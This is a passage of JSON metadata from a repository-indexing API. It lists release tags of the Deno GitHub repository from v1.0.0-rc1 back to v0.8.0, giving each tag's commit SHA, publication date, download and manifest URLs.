https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"